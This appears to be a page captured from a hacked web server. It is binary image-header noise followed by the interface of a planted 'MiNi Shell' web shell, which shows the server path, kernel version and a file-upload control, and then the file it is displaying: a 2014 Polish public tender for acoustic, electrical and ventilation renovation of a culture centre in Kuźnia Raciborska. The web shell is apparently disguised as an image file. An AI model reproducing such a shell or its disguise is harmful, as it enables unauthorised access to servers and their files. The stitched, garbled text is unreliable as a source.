JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140630/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140630/217656-N-2014.html

<p class="kh_header"><b>Kuźnia Raciborska: Remont Miejskiego Ośrodka Kultury Sportu i Rekreacji w Kuźni Raciborskiej Dla edukacji kulturalnej, ul. Klasztorna 9. Zadanie dofinansowane w ramach Programu: Rozwój Infrastruktury Kultury,Priorytetu: infrastruktura Domów Kultury ze środków finansowych Ministra Kultury i Dziedzictwa Narodowego, pochodzących z Funduszu Promocji.</b><br>
<b>Numer ogłoszenia: 217656 - 2014; data zamieszczenia: 30.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Kultury Sportu i Rekreacji , ul. Klasztorna 9, 47-420 Kuźnia Raciborska, woj. śląskie, tel. 032 4191407, faks 032 4191407.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kuzniakultury.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Miejskiego Ośrodka Kultury Sportu i Rekreacji w Kuźni Raciborskiej Dla edukacji kulturalnej, ul. Klasztorna 9. Zadanie dofinansowane w ramach Programu: Rozwój Infrastruktury Kultury,Priorytetu: infrastruktura Domów Kultury ze środków finansowych Ministra Kultury i Dziedzictwa Narodowego, pochodzących z Funduszu Promocji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zadania obejmuje Połączenie dwóch sal wielofunkcyjnych poprzez wyburzenie ściany i komina dzielące te pomieszczenia i zaprojektowania ściany składanej, modułowej, z wbudowanymi drzwiami 1m2/2m2, przesuwnej, dźwiękoszczelnej, jeżdżącej po torze, montowanej w suficie. Bez prowadnic przez podłogę. Przy składaniu moduł ściany umieszczony w parkownicy. Moduły wyposażone w rozpieracze. Wykończenie modułów fornirem naturalnym dębowym. Izolacja akustyczna co najmniej Rw= 55dB.
 Adaptacja pomieszczenia technicznego na pomieszczenie perkusji. Adaptacja projektorowni na pomieszczenia prób i pomieszczenie pianina. Z sal prowadzić będą wyjścia do wspólnego pomieszczenia o funkcji komunikacji wewnętrznej, skąd dalej prowadzić będzie wyjście przez istniejące pomieszczenie na drogę ewakuacyjną. Istniejące pomieszczenie projektorowni posiada 2 zewnętrzne okna o wymiarach 60x50cm, zlokalizowane na wysokości 4m od poziomu posadzki. Zgodnie z wymogami akustycznymi, sufit w pomieszczeniach ma być zlokalizowany na wysokości ok 3m. Remont pomieszczeń dla potrzeb pracowni oraz przyległej komunikacji kondygnacja 1 Sufity W pomieszczeniach perkusji, pianina i Sali prób należy wykonać sufit podwieszany łamany z płyt g k z podwójnym płytowaniem z izolacji akustycznej z wełny mineralnej, np. w systemie RIGIPS sufit podwieszany 4.05.24. W sufitach należy wykonać zgodnie z zasadami wg zał. Nr 03 i 05. Sufit należy oddylatować od ścian dylatacją np. z gumy neoprenowej lub pianki poliuretanowej. W suficie należy osadzić oświetlenie typu downlight,. Remont pomieszczeń dla po-trzeb pracowni oraz przyległej komunikacji kondygnacja 1. Ściany Ściany należy wykonać w technice systemowych akustycznych ścian gk RIGIPS AKULINE. Należy wykonać dwa rodzaje ścian ściany pomiędzy pomieszczeniami 3.41.053 AKU do pełnej wysokości po-mieszczenia adaptowanego, przedścianki wygłuszające 3.21.10 AKU do pełnej wysokości pomieszczenia adaptowanego. Ściany posiadają właściwości akustyczne o parametrach podanych przez producenta przy zastosowaniu kompletnego systemu karty katalogowej. Zmiana elementów składowych ściany może powodować pogorszenie właściwości akustycznych. Konstrukcje ścian należy rozpocząć na stropie właściwym bez z styku z podłogą pływającą sal. Część przedścianek należy wykonać jako ścianki w ustroju szczelinowym. Ustrój ma formę poziomych pasów utwardzanych płyt gk o szerokości 20cm, poprzedzielanych szczelinami o szerokości 3mm. Pomiędzy płytami a wełną mineralną należy zastosować membranę z flizeliny w celu zabezpieczenia wełny mineralnej. W miejscach oznaczonych jako dyfuzory akustyczne należy wbudować ścianę ustroje dyfuzorów akustycznych wg rysunków układów ścian i zestawienia dyfuzorów akustycznych. Dyfuzory należy wykonać ze sklejki gr. 10 i 5mm i zabezpieczyć impregnatem do stopnia trudno zapalności. W Sali wielofunkcyjnej pom. 1.01 należy wykonać do wysokości 2m zabudowę z luster wraz z montażem drążka na całej długości ściany. Remont pomieszczeń dla potrzeb pracowni oraz przyległej komunikacji kondygnacja 1.Podłogi W pomieszczeniach sal wielofunkcyjnych pom. 1.01 i 1.02 należy zdemontować wykładziny i płyty wiórowe a w ich miejsce należy wykonać parkiet przemysłowy na masie szpachlowej. Na klatce schodowej komunikacja pom. 1.03 należy zdemontować parkiet, i wykonać posadzkę z płytek ceramicznych. W pomieszczeniach perkusji pom 1.06, pianina pom 1.07 i pomieszczeniu prób 1.08 należy rozebrać istniejącą warstwę wykończeniową aż do wierzchu stropu właściwego i wykonać nową wylewkę w systemie podłogi pływającej na podkładzie z twardej wełny mineralnej np. STROPROCK firmy ROCKWOOL. Pomiędzy nową posadzką a ścianami i przedściankami należy wykonać dylatację elastyczną uniemożliwiającą przenoszenie drgań z podłogi na ścianę. Dopuszcza się pozostawienie istniejącej warstwy wykończeniowej posadzki i wykończenie je wykładziną, jednakże w miejscach nowych ścian i przedścianek należy usunąć fragmenty istniejącej posadzki w celu posadowienia ww ścian na stropie właściwym. Rozwiązanie z pozostawieniem istniejących warstw posadzki, ze względu na brak informacji na temat jakości wykonania istniejącej posadzki, niesie ze sobą ryzyko pogorszenia izolacji akustycznych pomieszczeń ze względu na możliwe stykanie się istniejącej wylewki ze stropem właściwym i przenoszenie dźwięków przez przewodzenie po stropie właściwym. Zakres robót elektrycznych Zakres robót dotyczy prac związanych z remontem i przebudową wewnętrznej instalacji elektrycznej dla pomieszczeń perkusji, pianina, sali prób, technicznym, korytarzy nr 1 i 2, sal wielofunkcyjnych nr 1 i 2, Montaż instalacji elektrycznej należy wykonać zasilanie nowej tablicy TPW, prefabrykacja i montaż tablicy TPW, wykonanie przepustów kablowych przez stropy, trasowanie, kucie bruzd, układanie rur, osadzanie puszek, układanie i mocowanie przewodów, przygotowanie końców żył i łączenie przewodów, montaż opraw oświetleniowych, montaż łączników oświetleniowych, montaż gniazd wtyczkowych, próby pomontażowe. Materiały do wykonania robót elektrycznych należy stosować zgodnie z dokumentacją projektową, opisem technicznym i rysunkami. W zestawieniu materiałów zaproponowano konkretne typy urządzeń z nazwy i pochodzenia. Dopuszcza się zastosowanie materiałów równoważnych przez materiały równoważne należy rozumieć takie, które mają te same cechy funkcjonalne, a ich jakość i parametry nie mogą być gorsze od wyspecyfikowanych w przedłożonej dokumentacji projektowej. Wszelkie materiały powinny odpowiadać wymaganiom zawartym w normach państwowych i świadectwach ITB dopuszczających dany materiał do powszechnego stosowania w budownictwie. Wykonawca jest odpowiedzialny za prowadzenie robót, zgodnie z Umową, oraz za jakość zastosowanych materiałów i wykonywanych robót, za ich zgodność z dokumentacją projektową, wymaganiami STWIOR oraz poleceniami Inspektora. Następstwa jakiegokolwiek błędu spowodowanego przez Wykonawcę w prowadzeniu robót, zostaną, jeśli wymagać tego będzie Inspektor, poprawione przez Wykonawcę na własny koszt. Polecenia Inspektora będą wykonywane przez Wykonawcę nie później niż w czasie przez niego wyznaczonym, pod groźbą zatrzymania robót. Skutki finansowe z tego tytułu ponosi Wykonawca. Wykonawca przedstawi do akceptacji projekt organizacji i harmonogram robót uwzględniający wszystkie warunki, w jakich będą wykonywane roboty instalacyjne. Po zakończeniu robót należy przeprowadzić próby montażowe obejmujące badania i pomiary. Zakres prób montażowych należy uzgodnić z Inwestorem. Zakres podstawowych prób obejmuje pomiar rezystancji izolacji instalacji w tym urządzeń. pomiary skuteczności ochrony przeciwporażeniowej samoczynne wyłączenie zasilania, pomiary oporności uziemienia. Instalacja wentylacji Miejskiego Ośrodka Kultury Sportu i Rekreacji należy wykonać na systemie wentylacji mechanicznej nawiewno wywiewnej o wydajności maksymalnej 400 m3 h przy sprężu 200 Pa, wyposażoną w przeciwprądowy wymiennik ciepła, nagrzewnicę elektryczną z płynną regulacją o mocy maksymalnej 1,3 kW, wentylatory, filtry i automatyczny bypass. Montowany system ma obsługiwać pomieszczenia perkusji, pianina, studia nagrań oraz korytarz, zlokalizowanych na piętrze budynku. Dopływ świeżego powietrza ma odbywać się przez czerpnię ścienną, za-montowaną w oknie o wym. 900x600 mm, po czym strumień ten ma być kierowany przez centralę do sal i korytarza. Zużyte powietrze ma być usuwane na zewnątrz budynku przez wyrzutnię ścienną, zamontowaną w oknie o wym. 900x600 w odległości ok. 11 metrów od czerpni ściennej. Nawiew oraz wywiew powietrza z przestrzeni objętych systemem wykonany ma być za pośrednictwem anemostatów wirowych nawiewnych i wywiewnych typu SDC firmy Centrum Klima o odpowiednich wymiarach opisanych na rysunku, wyposażonych w skrzynki rozprężne, w celu lepszej regulacji instalacji. Dodatkowo przy każdym rozgałęzieniu zastosowano przepustnice regulacyjne. Ponadto system wentylacji wyposażony ma być w tłumiki, których głównym celem jest zmniejszenie hałasu oraz nagrzewnicę elektryczną z płynną regulacją, która dogrzewa powietrze wewnątrz pomieszczeń. Ze względu na mocniejsze wygłuszenie przewód wentylacyjny prowadzony od czerpni do centrali oraz przewód wyrzutowy prowadzony od centrali do tłumika będą wyłożone od wewnątrz izolacją i na zewnątrz wełną 50 mm z klejem, a przewód wywiewny od tłumika do wyrzutni będzie izolowany wełną 50 mm z klejem. Pozostałe kanały i kształtki izolowane będą wełną mineralną o grubości 30 mm. Powyższy system wentylacji ma zapewniać min. 30 m3 h osobę. Instalacja winna być wykonana zgodnie z normą PN 781B 10440 Urządzenia wentylacyjne. Wymagania i badania przy odbiorze oraz zgodnie z normą PN 79B 10440 .Wentylacja mechaniczna. Urządzenia wentylacyjne. Wymagania i badania przy odbiorze. Dopuszcza się zastosowanie zamienników urządzeń i elementów wentylacyjnych jednak o parametrach nie gorszych od zaprojektowanych, Urządzenia i elementy wentylacyjne powinny być zamontowane zgodnie z instrukcją producenta, Wszystkie otwory w ścianach fundamentowych i konstrukcyjnych należy wykonać w trakcie ich wznoszenia, Przed przystąpieniem do robót należy zmierzyć dokładnie szerokość i wysokość pomieszczeń, Przed wykonaniem kanałów wentylacyjnych należy sprawdzić na budowie możliwość ich montażu zgodnie z dokumentacją. Przewody wentylacyjne przechodzące przez przegrody budowlane powinny być odizolowane od konstrukcji wełną mineralną lub pianką montażową. Kanały prostokątne oraz okrągłe typu Spiro instalacji wentylacyjnej wykonać z blachy ocynkowanej, zgodnie z PN EN1507 klasa wykonania A1. Przewody instalacji wentylacji należy izolować termicznie wełną z klejem 20 mm, kanały prowadzone od centrali do czerpni 30 mm wytłumić Armaflexem od środka, Prowadzenie kanałów należy wykonać zgodnie z rysunkami niniejszego opracowania. Po montażu kanałów wentylacyjnych należy sprawdzić szczelność przewodów oraz przeprowadzić regulacje układu, Konstrukcję pod centralę należy wykonać z szyn systemowych firmy Fischer. Sposób mocowania urządzeń wentylacyjnych (tj. centrala, przepustnice, anemostaty), powinien zabezpieczać przed przenoszeniem ich drgań na konstrukcję budynku (zastosowanie różnego rodzaju amortyzatorów) oraz na instalację przez zastosowanie elastycznych połączeń. Całość prac przewidzianych niniejszym projektem wykonać należy zgodnie z PN oraz obowiązującymi przepisami w zakresie BHP, Otwory wlotowe czerpni oraz wylotowe wyrzutni powinny być zabezpieczone przed opadami atmosferycznymi oraz przedostaniem się liści, gryzoni i ptaków, Wszystkie urządzenia montować zgodnie z fabrycznymi DTR. Remont pomieszczeń dla potrzeb pracowni oraz przyległej komunikacji kondygnacja 1. Stolarka Wykonać drzwi techniczne o podwyższonych właściwościach akustycznych np. Porta drzwi akustyczne Rw42dB. Pomiędzy pomieszczeniami wykonać należy okna z profili PCV o podwyższonych właściwościach akustycznych W ramach realizacji przedmiotu zamówienia należy wykonać wszelkie prace pomocnicze i towarzyszące, które są konieczne do prawidłowego wykonania robót ujętych w przedmiarze robót wykonać wszelkie inne roboty, prace, niezbędne badania (laboratoryjne), sprawdzenia, pomiary, czynności, obowiązki i wymogi wynikające z niniejszej specyfikacji (umowy, specyfikacji technicznych wykonania i odbioru robót, projektów wykonawczych, przedmiarów robót. Wymagania dotyczące robót Wszystkie prace powinny być zrealizowane zgodnie z przepisami, obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż, zgodnie z poleceniami Przedstawiciela Zamawiającego na budowie inspektora nadzoru. Roboty należy prowadzić zgodnie z wymogami opisu przedmiotu zamówienia, projektem architektoniczno budowlanym, specyfikacją techniczną wykonania i odbioru robót oraz wymogami niniejszej SIWZ. Wytyczne dotyczące zagospodarowania odpadów Powstałe w wyniku prac odpady budowlane winny zostać zagospodarowane przez Wykonawcę zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach Dz. U. z 2013r. poz. 21 ze zm. Gmina Kuźnia Raciborska nie posiada na swoim terenie składowiska odpadów, należy zatem uwzględnić konieczność wywozu odpadów do stosownej instalacji zlokalizowanej poza terenem Gminy Kuźnia Raciborska. Inne uwarunkowania Podane w dokumentacji projektowej przykładowe nazwy handlowe materiałów i ich producentów nie stanowią nakazu ich stosowania. Nazwami handlowymi posłużono się w celu opisania parametrów jakościowych danego wyrobu. Dopuszcza się zastosowanie materiałów równoważnych o parametrach nie gorszych od w w. Przez materiały równoważne należy rozumieć takie, które mają te same cechy funkcjonalne, jakie zostały wskazane w dokumentacji konkretne z nazwy lub pochodzenia, a ich jakość i parametry nie mogą być gorsze od wyspecyfikowanych w przedmiotowym zestawieniu materiałów. W przypadku zastosowania innych zamienników rynkowych na Wykonawcy spoczywa obowiązek udokumentowania, że nie będą one gorsze od wskazanych przez Projektanta, zagwarantują uzyskanie co najmniej tych samych parametrów technicznych oraz posiadać będą niezbędne atesty i dopuszczenia do stosowania, wymagane w dokumentacji przetargowej. Wszystkie elementy wymienione powyżej mogą być zastąpione przez inne, równoważne, posiadające wszystkie wymagane atesty, certyfikaty i pozwolenia. Ciężar udowodnienia, że wyroby przyjęte przez Wykonawcę są równoważne w stosunku do zaproponowanych w dokumentacji projektowej, spoczywa na Wykonawcy. Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych. Wszystkie wymiary i powierzchnie należy sprawdzić przed zamówieniem materiałów. Wykonawca winien wydzielić i zabezpieczyć teren prowadzonych prac. Wykonywanie robót, odbiory częściowe oraz organizację bhp, ppoż. oraz koordynacja w zakresie bhp na terenie prowadzonych robót należy prowadzić w oparciu o aktualne normy i przepisy. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę żadnej części zamówienia na roboty budowlane. Wykonawca będzie zobligowany do bieżącego utrzymania czystości w ciągach komunikacyjnych prowadzących do prowadzonych robót...</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.43.21.13-9, 45.44.00.00-3, 45.42.00.00-7, 45.43.00.00-0, 45.43.20.00-4, 45.40.00.00-0, 45.33.00.00-9, 45.33.12.10-1, 45.31.11.00-0, 45.31.11.00-1, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponował w celu wykonania zamówienia:
1 osobą, która będzie pełnić funkcje kierownika budowy, posiadającą aktualne uprawnienia budowlane w specjalności konstrukcyjno-budowlanej lub uprawnienia równoważne i minimum  3 lata doświadczenia zawodowego w kierowaniu robotami budowlanymi, liczonego od daty uzyskania uprawnień budowlanych;
1 osobą, która będzie pełnić funkcję kierownika robót ,posiadającą aktualne uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych lub uprawnienia równoważne;
1 osobą, która będzie pełnić funkcję kierownika robót, posiadającą aktualne uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych lub uprawnienia równoważne.
Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu o których mowa w art 22 u.  1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
